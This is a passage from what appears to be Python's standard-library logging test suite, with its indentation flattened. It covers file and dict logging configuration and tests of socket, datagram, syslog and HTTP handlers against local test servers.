self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
if threading:
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
@unittest.skipUnless(threading, 'Threading required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = None # TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
